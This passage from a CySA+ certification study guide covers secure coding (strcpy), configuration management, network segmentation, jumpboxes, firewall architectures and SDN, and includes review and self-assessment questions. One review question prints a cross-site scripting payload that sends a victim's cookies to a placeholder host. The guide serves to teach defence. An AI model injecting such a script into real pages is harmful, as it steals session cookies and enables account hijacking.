(CVEs). In many cases these vulnerabilities have been
addressed and updates have been uploaded to the
repository. The problem is that far too many
vulnerabilities have not been addressed, and even in
cases where they have, developers continue to use the
vulnerable components instead of downloading the new
versions.
Developers who do rely on third-party repositories must
also keep track of the components’ updates and security
profiles.
Code Reuse
Not all code reuse comes from a third party. In some
cases, organizations maintain an internal code
repository. The Financial Services Information Sharing
and Analysis Center (FS-ISAC), an industry forum for
collaboration on critical security threats facing the global
financial services sector, recommends the following
measures to reduce the risk of reusing components in
general:
• Developers must apply policy controls during the
acquisition process as the most proactive type of
control for addressing the security vulnerabilities
in open-source libraries.
• Manage risk by using controlled internal
repositories to provision open-source components
and block the ability to download components
directly from the Internet.
Insufficient Logging and Monitoring
If the authentication system is broken, then the front
door is open. If there is insufficient logging and
monitoring, you don’t even know that someone came
through the front door! One of the challenges of staying
on top of log review is the overwhelming feeling that
other “things” are more important. Even when time is allotted, in many cases the sheer amount of data to
analyze is intimidating.
Audit reduction tools are preprocessors designed to
reduce the volume of audit records to facilitate manual
review. Before a security review, these tools can remove
many audit records known to have little security
significance. These tools generally remove records
generated by specified classes of events, such as records
generated by nightly backups. Some technicians make
use of scripts for this purpose. One such Perl script called
swatch (the “Simple WATCHer”) is used by many Linux
technicians.
For large enterprises, the amount of log data that needs
to be analyzed can be quite large. For this reason, many
organizations implement a security information and
event management (SIEM) system, which provides an
automated solution for analyzing events and deciding
where the attention needs to be given. In Chapter 11,
“Analyzing Data As Part of Security Monitoring
Activities,” you will learn more about SIEM.
Weak or Default Configurations
A default configuration is one where the settings from
the factory have not been changed. This can allow for
insecure settings because many vendors adopt security
settings that will provide functionality in the largest
number of scenarios. Functionality and security are two
completely different goals and are not always
compatible. Software settings should not be left to the
defaults and should be analyzed for the best
configuration for the scenario.
Misconfigurations are settings that depart from the
defaults but are still insecure. Some of the largest
breaches have occurred due to these “mistakes.” One of
the ways to gain some control over this process is to
implement a configuration management system.
Although it’s really a subset of change management,
configuration management specifically focuses on
bringing order out of the chaos that can occur when
multiple engineers and technicians have administrative
access to the computers and devices that make the
network function. The functions of configuration
management are as follows:
• Report the status of change processing.
• Document the functional and physical
characteristics of each configuration item.
• Perform information capture and version control.
• Control changes to the configuration items, and
issue versions of configuration items from the
software library.
Note
In the context of configuration management, a software library is a controlled
area accessible only to approved users who are restricted to the use of an
approved procedure. A configuration item (CI) is a uniquely identifiable subset
of the system that represents the smallest portion to be subject to an
independent configuration control procedure. When an operation is broken into
individual CIs, the process is called configuration identification.
Examples of these types of changes are as follows:
• Operating system configuration
• Software configuration
• Hardware configuration
The biggest contribution of configuration management
controls is ensuring that changes to the system do not
unintentionally diminish security. Because of this, all
changes must be documented, and all network diagrams,
both logical and physical, must be updated constantly
and consistently to accurately reflect the state of each
configuration now and not as it was two years ago.
Verifying that all configuration management policies are
being followed should be an ongoing process.
In many cases it is beneficial to form a configuration
control board. The tasks of the configuration control
board can include the following:
• Ensuring that changes made are approved, tested,
documented, and implemented correctly.
• Meeting periodically to discuss configuration
status accounting reports.
• Maintaining responsibility for ensuring that
changes made do not jeopardize the soundness of
the verification system.
In summary, the components of configuration
management are as follows:
• Configuration control
• Configuration status accounting
• Configuration audit
Use of Insecure Functions
Software developers use functions to make things
happen in software. Some functions are more secure
than others (although some programmers will tell you
they are all safe if used correctly). Developers should
research, identify, and avoid those functions that are
known to cause security issues.
strcpy
One function that has a reputation for issues is the strcpy function in C and C++. It copies the C string pointed to by source into the array pointed to by destination, including the terminating null character (and stopping at that point). The issue is that if the destination is not long enough to contain the string, an overrun occurs.
To avoid overflows, the array pointed to by destination must be long enough to contain the same C string as source (including the terminating null character) and must not overlap in memory with source.
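One common way to honor these requirements, sketched below, is to replace strcpy with a bounded copy that always null-terminates, such as snprintf. Reusing the earlier example, the source string is simply truncated instead of overrunning the buffer:

#include <stdio.h>

int main(void)
{
    const char *code = "AAAABBBBCCCCDDD"; /* 15 characters + '\0' = 16 bytes */
    char buf[8];

    /* snprintf() writes at most sizeof(buf) - 1 characters plus the terminator */
    snprintf(buf, sizeof(buf), "%s", code);
    printf("%s\n", buf);  /* prints the truncated "AAAABBB" */
    return 0;
}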
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 7-3 lists a reference of these key topics and the
page numbers on which each is found.
Table 7-3 Key Topics in Chapter 7
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Extensible Markup Language (XML) attack
eXtensible Access Control Markup Language (XACML)
policy enforcement point (PEP)
policy decision point (PDP)
Structured Query Language (SQL) injection
overflow attacks
buffer overflow
integer overflow
heap overflows
remote code execution
directory traversal
privilege escalation
password spraying
credential stuffing
man-in-the-middle attack
Dynamic ARP Inspection (DAI)
DHCP snooping
session hijacking
rootkit
cross-site scripting (XSS)
reflected XSS
persistent XSS
DOM XSS
dereference
insecure object reference
race condition
strcpy
REVIEW QUESTIONS
1. In XACML, the entity that is protecting the resource
that the subject (a user or an application) is
attempting to access is called the ____________.
2. Match the following terms with their definitions.
3. List at least one of the criteria used by XACML to
provide for fine-grained control of activities.
4. _________________________ occurs when
math operations try to create a numeric value that is too large for the available space.
5. Match the following terms with their definitions.
6. List at least one way that sessions can be hijacked.
7. What is the following script designed to do?
<SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
8. Match the following terms with their definitions.
9. List at least one of the functions of configuration
management.
10. ____________________ is a function that has
a reputation for issues in C++.
Chapter 8. Security
Solutions for
Infrastructure
Management
This chapter covers the following topics related
to Objective 2.1 (Given a scenario, apply security
solutions for infrastructure management) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
• Cloud vs. on-premises: Discusses the two main
infrastructure models: cloud vs. on-premises
• Asset management: Covers issues surrounding
asset management including asset tagging
• Segmentation: Describes physical and virtual
segmentation, jumpboxes, and system isolation
with an air gap
• Network architecture: Covers physical,
software-defined, virtual private cloud (VPC),
virtual private network (VPN), and serverless
architectures
• Change management: Discusses the formal
change management processes
• Virtualization: Focuses on virtual desktop
infrastructure (VDI)
• Containerization: Discusses an alternate form
of virtualization
• Identity and access management: Explores
privilege management, multifactor authentication
(MFA), single sign-on (SSO), federation, role-based access control, attribute-based access
control, mandatory access control, and manual
review
• Cloud access security broker (CASB):
Discusses the role of CASBs
• Honeypot: Covers placement and use of
honeypots
• Monitoring and logging: Explains monitoring
and logging processes
• Encryption: Introduces important types of
encryption
• Certificate management: Discusses issues
critical to managing certificates
• Active defense: Discusses defensive strategy in
the cybersecurity arena
Over the years, security solutions have been adopted,
discredited, and replaced as technology changes.
Cybersecurity professionals must know and understand
the pros and cons of various approaches to protect the
infrastructure. This chapter examines both old and new
solutions.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these 14 self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 8-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 8-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which statement is false with respect to
multitenancy in a cloud?
a. It can lead to allowing another tenant or
attacker to see others’ data or to assume the
identity of other clients.
b. It prevents residual data of former tenants
from being exposed in storage space assigned to
new tenants.
c. Users may lose access due to inadequate
redundancy and fault-tolerance measures.
d. Shared ownership of data with the customer
can limit the legal liability of the provider.
2. Which of the following involves marking a video,
photo, or other digital media with a GPS location?
a. TAXII
b. Geotagging
c. Geofencing
d. RFID
3. Which of the following is a network logically
separate from the other networks where resources
that will be accessed from the outside world are
made available to only those that are
authenticated?
a. Intranet
b. DMZ
c. Extranet
d. Internet
4. Which of the following terms refers to any device
exposed directly to the Internet or to any untrusted
network?
a. Screened subnet
b. Three-legged firewall
c. Bastion host
d. Screened host
5. Which statement is false regarding the change
management process?
a. All changes should be formally requested.
b. Each request should be approved as quickly as
possible.
c. Prior to formal approval, all costs and effects of
the methods of implementation should be
reviewed.
d. After they’re approved, the change steps should
be developed.
6. Which of the following is installed directly on
hardware and is considered “bare metal”?
a. Type 1 hypervisor
b. VMware Workstation
c. Type 2 hypervisor
d. Oracle VirtualBox
7. Which of the following is a technique in which the
kernel allows for multiple isolated user space
instances?
a. Containerization
b. Segmentation
c. Affinity
d. Secure boot
8. Which of the following authentication factors
represents something a person is?
a. Knowledge factor
b. Ownership factor
c. Characteristic factor
d. Location factor
9. Which of the following is a software layer that
operates as a gatekeeper between an organization’s
on-premises network and the provider’s cloud
environment?
a. Virtual router
b. CASB
c. Honeypot
d. Black hole
10. Which of the following is the key purpose of a
honeypot?
a. Loss minimization
b. Information gathering
c. Confusion
d. Retaliation
11. Which of the following relates to logon and
information security continuous monitoring?
a. IEEE 802.ac
b. ISO/IEC 27017
c. NIST SP 800-137
d. FIPS
12. Which of the following cryptographic techniques
provides the best method of ensuring integrity and
determines if data has been altered?
a. Encryption
b. Hashing
c. Digital signature
d. Certificate pinning
13. Which of the following PKI components verifies the
requestor’s identity and registers the requestor?
a. TA
b. CA
c. RA
d. BA
14. Which of the following is a new approach to security
that is offensive in nature rather than defensive?
a. Hunt teaming
b. White teaming
c. Blue teaming
d. APT
FOUNDATION TOPICS
CLOUD VS. ON-PREMISES
Accompanying the movement to virtualization is a
movement toward the placement of resources in a cloud
environment. While the cloud allows users to access the
resources from anywhere they can get Internet access, it
presents a security landscape that differs from the
security landscape of your on-premises resources. For
one thing, a public cloud solution relies on the security
practices of the provider.
These are the biggest risks you face when placing
resources in a public cloud:
• Multitenancy can lead to the following:
• Allowing another tenant or attacker to see
others’ data or to assume the identity of other
clients
• Residual data of former tenants exposed in
storage space assigned to new tenants
• The use of virtualization in cloud environments
leads to the same issues covered later in this
chapter in the section “Virtualization.”
• Mechanisms for authentication and authorization
may be improper or inadequate.
• Users may lose access due to inadequate
redundancy and fault-tolerance measures.
• Shared ownership of data with the customer can
limit the legal liability of the provider.
• The provider may use data improperly (such as
data mining).
• Data jurisdiction is an issue: Where does the data
actually reside, and what laws affect it, based on
its location?
Cloud Mitigations
Over time, best practices have emerged to address both
cloud and on-premises environments. With regard to the
cloud, it is incumbent on the customer to take an active
role in ensuring security, including the following:
• Understand you share responsibility for security
with the vendor
• Ask, don’t assume, with regard to detailed security
questions
• Deploy an identity and access management
solution that supports cloud
• Train your staff
• Establish and enforce cloud security policies
• Consider a third-party partner if you don’t have
the skill sets to protect yourself
ASSET MANAGEMENT
Asset management and inventory control across the
technology life cycle are critical to ensuring that assets
are not stolen or lost and that data on assets is not
compromised in any way. Asset management and
inventory control are two related areas. Asset
management involves tracking the devices that an
organization owns, and inventory control involves
tracking and containing inventory. All organizations
should implement asset management, but not all
organizations need to implement inventory control.
Asset Tagging
Asset tagging is the process of placing physical
identification numbers of some sort on all assets. This
can be as simple as a small label that identifies the asset
and the owner, as shown in Figure 8-1.
Figure 8-1 Asset Tag
Asset tagging can also be part of a more robust asset-tracking system when implemented in such a way that
the device can be tracked and located at any point in
time. Let’s delve into the details of such systems.
Device-Tracking Technologies
Device-tracking technologies allow organizations to
determine the location of a device and also often allow
the organization to retrieve the device. However, if the
device cannot be retrieved, it may be necessary to wipe
the device to ensure that the data on the device cannot be
accessed by unauthorized users. As a security
practitioner, you should stress to your organization the
need to implement device-tracking technologies and
remote-wiping capabilities.
Geolocation/GPS Location
Device-tracking technologies include geolocation, or
Global Positioning System (GPS) location. With this
technology, location and time information about an asset
can be tracked, provided that the appropriate feature is
enabled on the device. For most mobile devices, the
geolocation or GPS location feature can be enhanced
through the use of Wi-Fi networks. A security
practitioner must ensure that the organization enacts
mobile device security policies that include the
mandatory use of GPS location features. In addition, it
will be necessary to set up appropriate accounts that
allow personnel to use the vendor’s online service for
device location. Finally, remote-locking and remote-wiping features should be seriously considered,
particularly if the mobile devices contain confidential or
private information.
Object-Tracking and Object-Containment Technologies
Object-tracking and object-containment technologies are
primarily concerned with ensuring that inventory
remains within a predefined location or area. Object-tracking technologies allow organizations to determine
the location of inventory. Object-containment
technologies alert personnel within the organization if
inventory has left the perimeter of the predefined
location or area.
For most organizations, object-tracking and object-containment technologies are used only for inventory
assets above a certain value. For example, most retail
stores implement object-containment technologies for
high-priced electronics devices and jewelry. However,
some organizations implement these technologies for all
inventory, particularly in large warehouse environments.
Technologies used in this area include
geotagging/geofencing and RFID.
Geotagging/Geofencing
Geotagging involves marking a video, photo, or other
digital media with a GPS location. This feature has
received criticism recently because attackers can use it to
pinpoint personal information, such as the location of a
person’s home. However, for organizations, geotagging
can be used to create location-based news and media
feeds. In the retail industry, geotagging can be helpful for
allowing customers to locate a store where a specific
piece of merchandise is available.
Geofencing uses the GPS to define geographical
boundaries. A geofence is a virtual barrier, and alerts can
occur when inventory enters or exits the boundary.
Geofencing is used in retail management, transportation
management, human resources management, law
enforcement, and other areas.
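To make the geofencing logic concrete, here is a minimal Python sketch of the containment check such a system performs. The warehouse coordinates and the 200-meter radius are hypothetical, and a production system would receive positions from GPS receivers or readers rather than hard-coded values:

import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance between two GPS points, in meters."""
    r = 6371000  # mean Earth radius in meters
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def inside_geofence(position, fence_center, radius_m):
    """True if a GPS position lies within a circular geofence."""
    return haversine_m(*position, *fence_center) <= radius_m

# Hypothetical example: alert when a pallet leaves a 200 m fence
# drawn around the warehouse.
warehouse = (35.2271, -80.8431)
pallet = (35.2300, -80.8435)
if not inside_geofence(pallet, warehouse, 200):
    print("ALERT: inventory has left the geofence")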
RFID
Radio frequency identification (RFID) uses radio
frequency chips and readers to manage inventory. The
chips are placed on individual pieces or pallets of
inventory. RFID readers are placed throughout the
location to communicate with the chips. Identification
and location information are collected as part of the
RFID communication. Organizations can customize the
information that is stored on an RFID chip to suit their
needs.
Two types of RFID systems can be deployed: active
reader/passive tag (ARPT) and active reader/active tag
(ARAT). In an ARPT system, the active reader transmits
signals and receives replies from passive tags. In an
ARAT system, active tags are woken with signals from
the active reader.
RFID chips can be read only if they are within a certain
proximity of the RFID reader. A recent implementation
of RFID chips is the Walt Disney MagicBand, which is
issued to visitors at Disney resorts and theme parks. The
band verifies park admission and allows visitors to
reserve attraction and restaurant times and pay for purchases
in the resort.
Different RFID systems are available for different
wireless frequencies. If your organization decides to
implement RFID, it is important that you fully research
the advantages and disadvantages of different
frequencies.
SEGMENTATION
One of the best ways to protect sensitive resources is to
utilize network segmentation. When you segment a
network, you create security zones that are separated
from one another by devices such as firewalls and routers
that can be used to control the flow of traffic between the
zones.
Physical
Physical segmentation is a tried and true method of
segmentation. While there is no limit to the number of
zones you can create in general, most networks have the
zone types discussed in the following sections.
LAN
Let’s talk about what makes a local-area network (LAN)
local. Although classically we think of a LAN as a
network located in one location, such as a single office,
it is more accurate to think of a LAN as a group of
systems connected by fast links. For
purposes of this discussion, that is any connection over
10 Mbps. This might not seem very fast to you, but it is
fast compared to a wide-area network (WAN). Even a T1
connection is only 1.544 Mbps. Using this as our
yardstick, if a single campus network has a WAN
connection between two buildings, then the two
networks are considered two LANs rather than a single
LAN. In most cases, however, networks in a single
campus are typically not connected with a WAN
connection, which is why usually you hear a LAN defined
as a network in a single location.
Intranet
Within the boundaries of a single LAN, there can be
subdivisions for security purposes. The LAN might be
divided into an intranet and an extranet. The intranet is
the internal network of the enterprise. It is considered a
trusted network and typically houses any sensitive
information and systems and should receive maximum
protection with firewalls and strong authentication
mechanisms.
Extranet
An extranet is a network logically separate from the
intranet where resources that will be accessed from the
outside world are made available to authorized,
authenticated third parties. Access might be granted to
customers or business partners. All traffic between the
extranet and the intranet should be closely monitored
and securely controlled. Nothing of a sensitive nature
should be placed in the extranet.
DMZ
Like an extranet, a demilitarized zone (DMZ) is a
network logically separate from the intranet where
resources that will be accessed from the outside world
are made available. The difference is that usually an
extranet contains resources available only to certain
entities from the outside world, and access is secured
with authentication, whereas a DMZ usually contains
resources available to everyone from the outside world,
without authentication. A DMZ might contain web
servers, email servers, or DNS servers. Figure 8-2 shows
the relationship between intranet, extranet, Internet, and
DMZ networks.
Figure 8-2 Network Segmentation
Virtual
While all the network segmentation components
discussed thus far separate networks physically with
devices such as routers and firewalls, a virtual local-area network (VLAN) separates them logically.
Enterprise-level switches are capable of creating VLANs.
These are logical subdivisions of a switch that segregates
ports from one another as if they were in different LANs.
VLANs can also span multiple switches, meaning that
devices connected to switches in different parts of a
network can be placed in the same VLAN, regardless of
physical location.
A VLAN adds a layer of separation between sensitive
devices and the rest of the network. For example, if only
two devices should be able to connect to the HR server,
the two devices and the HR server could be placed in a
VLAN separate from the other VLANs. Traffic between
VLANs can only occur through a router. Routers can be
used to implement access control lists (ACLs) that
control the traffic allowed between VLANs. Figure 8-3
shows an example of a network with VLANs.
Figure 8-3 VLANs
VLANs can be used to address threats that exist within a
network, such as the following:
• DoS attacks: When you place devices with
sensitive information in a separate VLAN, they are
shielded from both Layer 2 and Layer 3 DoS
attacks from devices that are not in that VLAN.
Because many of these attacks use network
broadcasts, if they are in a separate VLAN, they
will not receive broadcasts unless they originate
from the same VLAN.
• Unauthorized access: While permissions
should be used to secure resources on sensitive
devices, placing those devices in a secure VLAN
allows you to deploy ACLs on the router to allow
only authorized users to connect to the device.
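The router ACLs just mentioned are evaluated top-down, and the first matching rule wins. Here is a minimal Python sketch of that evaluation logic; the VLAN subnets and rules are hypothetical:

from ipaddress import ip_address, ip_network

# Hypothetical ACL on the router interface between VLANs; each rule
# is (action, source network, destination network).
ACL = [
    ("permit", ip_network("10.10.20.0/24"), ip_network("10.10.99.10/32")),  # HR admins to HR server
    ("deny", ip_network("0.0.0.0/0"), ip_network("10.10.99.0/24")),         # all others blocked from HR VLAN
    ("permit", ip_network("0.0.0.0/0"), ip_network("0.0.0.0/0")),           # remaining inter-VLAN traffic
]

def acl_decision(src, dst):
    """First-match evaluation, the way router ACLs are processed."""
    src, dst = ip_address(src), ip_address(dst)
    for action, src_net, dst_net in ACL:
        if src in src_net and dst in dst_net:
            return action
    return "deny"  # implicit deny if nothing matches

print(acl_decision("10.10.20.5", "10.10.99.10"))  # permit: authorized workstation
print(acl_decision("10.10.30.7", "10.10.99.10"))  # deny: outside the permitted VLAN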
Jumpbox
A jumpbox, or jump server, is a server that is used to
access devices that have been placed in a secure network
zone such as a DMZ. The server would span the two
networks to provide access from an administrative
desktop to the managed device. Secure Shell (SSH)
tunneling is the de facto method of access.
Administrators can use multiple zone-specific jumpboxes
to access what they need, and lateral access between
servers is prevented by whitelists. This helps prevent the
types of breaches suffered by both Target and Home
Depot, in which lateral access was used to move from
one compromised device to other servers. Figure 8-4
shows a jumpbox (jump server) arrangement.
Figure 8-4 Jumpboxes
A jumpbox arrangement can avoid the following issues:
• Breaches that occur from lateral access
• Inappropriate administrative access of sensitive
servers
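In practice, administrators often reach a managed host through the jumpbox with OpenSSH's ProxyJump (-J) option, which tunnels the session through the intermediate server. The following is a minimal Python sketch; the hostnames are hypothetical, and it assumes an OpenSSH client is installed on the administrative desktop:

import subprocess

# Hypothetical hostnames: administrators reach the DMZ web server
# only by hopping through the zone-specific jumpbox.
JUMPBOX = "admin@jump.dmz.example.com"
TARGET = "admin@web01.dmz.example.com"

def run_via_jumpbox(command):
    """Run a command on the managed host through the jumpbox using
    OpenSSH's ProxyJump (-J) option; no direct route is required."""
    return subprocess.run(
        ["ssh", "-J", JUMPBOX, TARGET, command],
        capture_output=True, text=True,
    )

result = run_via_jumpbox("uptime")
print(result.stdout)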
System Isolation
While the safest device is one that is not connected to
any networks, disconnecting devices is typically not a
workable solution if you need to access the data on a
system. However, there are some middle-ground
solutions between total isolation and total access.
Systems can be isolated from other systems through the
control of communications with the device. An example
of system isolation is through the use of Microsoft
Server isolation. By leveraging Group Policy (GP)
settings, you can require that all communication with
isolated servers must be authenticated and protected
(and optionally encrypted as well) by using IPsec. As
Group Policy settings can only be applied to computers
that are domain members, computers that are not
domain members must be specified as exceptions to the
rules controlling access to the device if they need access.
Figure 8-5 shows the results of three different types of
devices attempting to access an isolated server. The
non-domain device (unmanaged) cannot connect, while the
unmanaged device that has been excepted can, and the
domain member that lies within the isolated domain can
also.
Figure 8-5 Server Isolation
The device that is a domain member (Computer 1) with
the proper Group Policy settings to establish an
authenticated session is allowed access. The computer
that is not a domain member but has been excepted is
allowed an unauthenticated session. Finally, a device
missing the proper GP settings to establish an
authenticated session is not allowed access. This is just
one example of how devices can be isolated.
Air Gap
In cases where data security concerns are extreme, it
may even be advisable to protect the underlying system
with an air gap. This means the device has no network
connections and all access to the system must be done
manually by adding and removing items such as updates
and patches with a flash drive or other external device.
Any updates to the data on the device must be done
manually, using external media. An example of when it
might be appropriate to do so is in the case of a
certificate authority (CA) root server. If a root CA is in
some way compromised (broken into, hacked, stolen, or
accessed by an unauthorized or malicious person), all the
certificates that were issued by that CA are also
compromised.
NETWORK ARCHITECTURE
Network architecture refers not only to the components
that are arranged and connected to one another (physical
architecture) but also to the communication paths the
network uses (logical architecture). This section surveys
security considerations for a number of different
architectures that can be implemented both physically
and virtually.
Physical
The physical network comprises the physical devices and
their connections to one another. The physical network
in many cases serves as an underlay or carrier for higher-level network processes and protocols.
Security practitioners must understand two main types
of enterprise deployment diagrams:
• Logical deployment diagram: Shows the
architecture, including the domain architecture,
with the existing domain hierarchy, names, and
addressing scheme; server roles; and trust
relationships.
• Physical deployment diagram: Shows the
details of physical communication links, such as
cable length, grade, and wiring paths; servers,
with computer name, IP address (if static), server
role, and domain membership; device location,
such as printer, hub, switch, modem, router, or
bridge, as well as proxy location; communication
links and the available bandwidth between sites;
and the number of users, including mobile users,
at each site.
A logical diagram usually contains less information than
a physical diagram. While you can often create a logical
diagram from a physical diagram, it is nearly impossible
to create a physical diagram from a logical one.
Figure 8-6 shows an example of a logical network
diagram.
Figure 8-6 Logical Network Diagram
As you can see, the logical network diagram shows only a
few of the servers in the network, the services they
provide, their IP addresses, and their DNS names. The
relationships between the different servers are shown by
the arrows between them. Figure 8-7 shows an example
of a physical network diagram.
Figure 8-7 Physical Network Diagram
A physical network diagram gives much more
information than a logical one, including the cabling
used, the devices on the network, the pertinent
information for each server, and other connection
information.
Note
CySA+ firewall-related objectives including firewall logs, web application
firewalls (WAFs), and implementing configuration changes to firewalls are
covered later in the book in Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
Firewall Architecture
Whereas the type of firewall speaks to the internal
operation of the firewall, the architecture refers to the
way in which firewalls are deployed in the network to
form a system of protection. The following sections look
at the various ways firewalls can be deployed.
Bastion Hosts
A bastion host may or may not be a firewall. The term
actually refers to the position of any device. If the device
is exposed directly to the Internet or to any untrusted
network while screening the rest of the network from
exposure, it is a bastion host. Some other examples of
bastion hosts are FTP servers, DNS servers, web servers,
and email servers. In any case where a host must be
publicly accessible from the Internet, the device must be
treated as a bastion host, and you should take the
following measures to protect these machines:
• Disable or remove all unnecessary services,
protocols, programs, and network ports.
• Use authentication services separate from those of
the trusted hosts within the network.
• Remove as many utilities and system
configuration tools as is practical.
• Install all appropriate service packs, hotfixes, and
patches.
• Encrypt any local user account and password
databases.
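A simple way to audit the first of these measures is to verify that a bastion host exposes only the ports it is supposed to. Here is a minimal Python sketch using only the standard library; the hostname and expected port set are hypothetical:

import socket

BASTION = "bastion.example.com"  # hypothetical host
EXPECTED_OPEN = {25, 53}         # e.g., the SMTP/DNS bastion host

def open_tcp_ports(host, ports, timeout=1.0):
    """Return the subset of ports accepting a TCP connection.
    (A simplification: services such as DNS also listen on UDP.)"""
    found = set()
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                found.add(port)
    return found

unexpected = open_tcp_ports(BASTION, range(1, 1025)) - EXPECTED_OPEN
if unexpected:
    print(f"Harden the bastion host: unexpected open ports {sorted(unexpected)}")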
A bastion host can be located in the following locations:
• Behind the exterior and interior firewalls:
Locating it here and keeping it separate from the
interior network complicates the configuration
but is safest.
• Behind the exterior firewall only: Perhaps
the most common location for a bastion host is
separated from the internal network; this is a less
complicated configuration. Figure 8-8 shows an
example in which there are two bastion hosts: the
FTP/WWW server and the SMTP/DNS server.
• As both the exterior firewall and a bastion
host: This setup exposes the host to the most
danger.
Figure 8-8 Bastion Host in a Screened Subnet
Dual-Homed Firewalls
A dual-homed firewall has two network interfaces:
one pointing to the internal network and another
connected to the untrusted network. In many cases,
routing between these interfaces is turned off. The
firewall software allows or denies traffic between the two
interfaces based on the firewall rules configured by the
administrator. The following are some of the advantages
of this setup:
• The configuration is simple.
• It is possible to perform IP masquerading (NAT).
• It is less costly than using two firewalls.
Disadvantages include the following:
• There is a single point of failure.
• It is not as secure as other options.
Figure 8-9 shows a dual-homed firewall (also called a
dual-homed host) location.
Figure 8-9 Location of Dual-Homed Firewall
Multihomed Firewall
A firewall can be multihomed. One popular type of
multihomed firewall is the three-legged firewall. In
this configuration, there are three interfaces: one
connected to the untrusted network, one connected to
the internal network, and one connected to a DMZ. As
mentioned earlier in this chapter, a DMZ is a protected
network that contains systems needing a higher level of
protection. The advantages of a three-legged firewall
include the following:
• It offers cost savings on devices because you need
only one firewall and not two or three.
• It is possible to perform IP masquerading (NAT)
on the internal network while not doing so for the
DMZ.
Among the disadvantages are the following:
• The complexity of the configuration is increased.
• There is a single point of failure.
The location of a three-legged firewall is shown in Figure
8-10.
Figure 8-10 Location of a Three-legged Firewall
Screened Host Firewalls
A screened host firewall is located between the final
router and the internal network. The advantages to a
screened host firewall solution include the following:
• It offers more flexibility than a dual-homed
firewall because rules rather than an interface
create the separation.
• Potential cost savings.
The disadvantages include the following:
• The configuration is more complex.
• It is easier to violate the policies than with dual-homed firewalls.
Figure 8-11 shows the location of a screened host
firewall.
Figure 8-11 Location of a Screened Host Firewall
Screened Subnets
In a screened subnet, two firewalls are used, and
traffic must be inspected at both firewalls before it can
enter the internal network. The advantages of a screened
subnet include the following:
• It offers the added security of two firewalls before
the internal network.
• One firewall is placed before the DMZ, protecting
the devices in the DMZ.
Disadvantages include the following:
• It is more costly than using either a dual-homed or
three-legged firewall.
• Configuring two firewalls adds complexity.
Figure 8-12 shows the placement of the firewalls to
create a screened subnet. The router is acting as the
outside firewall, and the firewall appliance is the second
firewall. In any situation where multiple firewalls are in
use, such as an active/passive cluster of two firewalls,
care should be taken to ensure that TCP sessions are not
traversing one firewall while return traffic of the same
session is traversing the other. When stateful filtering is
being performed, the return traffic will be denied, which
will break the user connection. In the real world, various
firewall approaches are mixed and matched to meet
requirements, and you may find elements of all these
architectural concepts being applied to a specific
situation.
Figure 8-12 Location of a Screened Subnet
Software-Defined Networking
In a network, three planes typically form the networking
architecture:
• Control plane: This plane carries signaling
traffic originating from or destined for a router.
This is the information that allows routers to
share information and build routing tables.
• Data plane: Also known as the forwarding plane,
this plane carries user traffic.
• Management plane: This plane administers
the router.
Software-defined networking (SDN) has been
classically defined as the decoupling of the control plane
and the data plane in networking. In a conventional
network, these planes are implemented in the firmware
of routers and switches. SDN implements the control
plane in software, which enables programmatic access to
it.
This definition has evolved over time to focus more on
providing programmatic interfaces to networking
equipment and less on the decoupling of the control and
data planes. An example of this is the provision of
application programming interfaces (APIs) by vendors
into the multiple platforms they sell.
One advantage of SDN is that it enables very detailed
access into, and control over, network elements. It allows
IT organizations to replace a manual interface with a
programmatic one that can enable the automation of
configuration and policy management.
An example of the use of SDN is using software to
centralize the control plane of multiple switches that
normally operate independently. (While the control
plane normally functions in hardware, with SDN it is
performed in software.) Figure 8-13 illustrates this
concept.
Figure 8-13 Centralized and Decentralized SDN
The advantages of SDN include the following:
• Mixing and matching solutions from different
vendors is simple.
• SDN offers choice, speed, and agility in
deployment.
The following are disadvantages of SDN:
• Loss of connectivity to the controller brings down
the entire network.
• SDN can potentially allow attacks on the
controller.
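To make the programmatic interface concrete, the following minimal Python sketch pushes a flow policy to an SDN controller's northbound REST API. The controller URL, endpoint path, and policy format are all hypothetical; real controllers such as OpenDaylight and ONOS each define their own APIs:

import json
import urllib.request

CONTROLLER = "https://sdn-controller.example.com:8443"  # hypothetical

def push_flow_policy(policy):
    """POST a flow policy to the controller's (hypothetical) REST
    endpoint instead of configuring each switch by hand."""
    req = urllib.request.Request(
        f"{CONTROLLER}/api/flows",
        data=json.dumps(policy).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status

# Drop traffic from a quarantined VLAN at every switch with one call.
print(push_flow_policy({"match": {"vlan": 66}, "action": "drop"}))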
Virtual SAN
A virtual storage area network (VSAN) is a
software-defined storage method that allows pooling of
storage capabilities and instant and automatic
provisioning of virtual machine storage. This is a method
of software-defined storage (SDS). It usually includes
dynamic tiering, QoS, caching, replication, and cloning.
Data availability is ensured through the software, not by
implementing redundant hardware. Administrators are
able to define policies that allow the software to
determine the best placement of data. By including
intelligent data placement, software-based controllers,
and software RAID, a VSAN can provide better data
protection and availability than traditional hardware-only
options.
Virtual Private Cloud (VPC)
In Chapter 6, “Threats and Vulnerabilities Associated
with Operating in the Cloud,” you learned about cloud
deployment models, one of which was the hybrid model.
A type of hybrid model is the virtual private cloud
(VPC) model. In this model, a public cloud provider
